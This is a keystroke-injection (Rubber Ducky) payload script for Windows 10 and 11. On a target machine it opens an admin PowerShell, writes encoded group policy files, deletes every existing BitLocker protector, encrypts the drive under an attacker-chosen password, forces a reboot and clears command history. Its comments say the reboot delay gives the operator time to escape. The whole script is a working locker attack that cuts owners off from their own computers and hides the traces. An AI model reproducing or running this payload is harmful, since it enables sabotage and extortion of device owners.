REM Enable Bitlocker encryption with a user-supplied password
REM and optionally reboot the computer immediately
REM Author: emptythevoid
REM Target: Windows 10, 11
REM MORE RESEARCH REQUIRED
REM ==INFO========================================================================================
REM If the drive is already encrypted with a protector (like TPM)
REM it will delete all protectors and substitute our own new password
REM without needing to re-encrypt.
REM If the drive doesn't have bitlocker enabled, it will do so with the new password
REM and take effect on next reboot (which you can optionally enable at the end)
REM Note #1: This will likely fail if the drive is currently in the process of encryption.
REM Note #2: If the target computer is a tablet (aka "slab"), Windows will disallow
REM preboot authentication options that might require a keyboard. To override this,
REM you have to set a local group policy. This might be possible to do by editing the
REM registry directly, but since Windows specifically complains about Group Policy,
REM I've encoded a Registry.pol below that you can optionally deploy.
REM It will create a file in C:\Windows\System32\GroupPolicy\Machine
REM which should take effect immediately.
REM This Registry.pol enables these two policy values:
REM Computer Configuration\Administrative Templates\Windows Components\Bitlocker Drive Encryption\Operating System Drives\ Enable use of Bitlocker authentication requiring preboot keyboard input on slates
REM Computer Configuration > Administrative Templates > Windows Components > Bitlocker Drive Encryption > Operating System Drives > Open the key Require additional authentication at startup
REM ==Launch command prompt as Admin using GUI + X ===============================================
REM ==NOTE that this brings up a Powershell window, not cmd.exe===================================
REM ==This method may be more reliable since GUI r can sometimes lose focus on open===============
GUI x
DELAY 200
STRING A
DELAY 1000
ALT y
DELAY 3000
REM ==Optional - local group policy to allow password protection on tablets========================
REM ==Simply copying the registry.pol file is not sufficient.
REM STRING $folderpath = [Environment]::GetFolderPath("C:\Windows\System32\GroupPolicy\Machine");
REM STRING $filename = $folderpath+"\Registry.pol";
STRING mkdir C:\windows\system32\grouppolicy\machine
DELAY 100
ENTER
DELAY 100
STRING $filename = "C:\Windows\System32\GroupPolicy\Machine\Registry.pol";
STRING $b64="UFJlZwEAAABbAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwA
STRING RgBWAEUAAAA7AE8AUwBFAG4AYQBiAGwAZQBQAHIAZQBiAG8AbwB0AEkAbgBwAHUAdABQAHIAbwB0AGUAYwB0AG8AcgBzAE8AbgB
STRING TAGwAYQB0AGUAcwAAADsABAAAADsABAAAADsAAQAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAY
STRING wByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBBAGQAdgBhAG4AYwBlAGQAUwB0AGEAcgB0AHUAcAAAADsABAAAADsABAAAADsAAQAAA
STRING F0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBFAG4AYQBiAGwAZQ
STRING BCAEQARQBXAGkAdABoAE4AbwBUAFAATQAAADsABAAAADsABAAAADsAAQAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAG
STRING kAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQAAADsABAAAADsABAAAADsAAgAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8
STRING AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQBQAEkATgAAADsABAAAADsABAAAADsAAgAAAF0
STRING AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQBLAGU
STRING AeQAAADsABAAAADsABAAAADsAAgAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEY
STRING AVgBFAAAAOwBVAHMAZQBUAFAATQBLAGUAeQBQAEkATgAAADsABAAAADsABAAAADsAAgAAAF0A";
STRING $bytes = [Convert]::FromBase64String($b64);
STRING [IO.File]::WriteAllBytes($filename, $bytes);
DELAY 300
REM Create the GPT file. This is definitely required, but I don't know if it changes per machine
STRING $filename = "C:\Windows\System32\GroupPolicy\gpt.ini";
STRING $b64="W0dlbmVyYWxdDQpnUENNYWNoaW5lRXh0ZW5zaW9uTmFtZXM9W3szNTM3OEVBQy02ODNGLTExRDItQTg5
STRING QS0wMEMwNEZCQkNGQTJ9e0QwMkIxRjcyLTM0MDctNDhBRS1CQTg4LUU4MjEzQzY3NjFGMX1dIA0KVmVyc2lvbj01DQo=";
STRING $bytes = [Convert]::FromBase64String($b64);
STRING [IO.File]::WriteAllBytes($filename, $bytes);
DELAY 300
REM have to gpupdate. This will take an undetermined amount of time
REM you may need to set this to trigger on a button press rather than a delay
STRING gpupdate /force
ENTER
DELAY 10000
REM ==Remove existing keys, in case bitlocker is already enabled==================================
STRING manage-bde -protectors -delete C:
ENTER
DELAY 1000
REM ==Clear out from messages, in case no protectors, just in case================================
ENTER
DELAY 2000
REM ==Enable bitlocker on C: with password and skip hardware test=================================
STRING manage-bde -on C: -skiphardwaretest
ENTER
DELAY 500
REM ==remove default TPM. We don't want this enabled.=============================================
STRING manage-bde -protectors -delete C:
ENTER
DELAY 1000
REM ==Manually add password as a protector. SET YOUR PASSWORD HERE!!==============================
REM ==MUST BE AT LEAST 8 CHARACTERS LONG OR ELSE IT WILL FAIL=====================================
DELAY 1000
STRING manage-bde -protectors -add C: -password
ENTER
DELAY 1000
STRING yourpasswordhere
ENTER
DELAY 1000
STRING yourpasswordhere
ENTER
DELAY 3000
REM ==Force the protection to be enabled so that it engages at next reboot========================
STRING manage-bde -Protectors -Enable C:
ENTER
DELAY 2000
REM ==Optional - Reboot after a delay. Give you time to escape====================================
STRING shutdown /r /t 30
ENTER
DELAY 2000
ENTER
DELAY 500
REM ==Clear history of Windows Terminal====================================
ALT F7
DELAY 200
REM ==Enable this if you are doing a delayed reboot using traditional command prompt========================
REM ALT F4
REM ==Enable this if you are doing a delayed reboot using GUI x prompt======================================
STRING exit
ENTER
REM ==Optional - Clear run history - not needed if using GUI +X ===================================
REM GUI r
REM DELAY 500
REM STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
REM ENTER
REM DELAY 300
REM ==Optional - reboot immediately to lock the computer==========================================
REM STRING shutdown /r /t 0
REM ENTER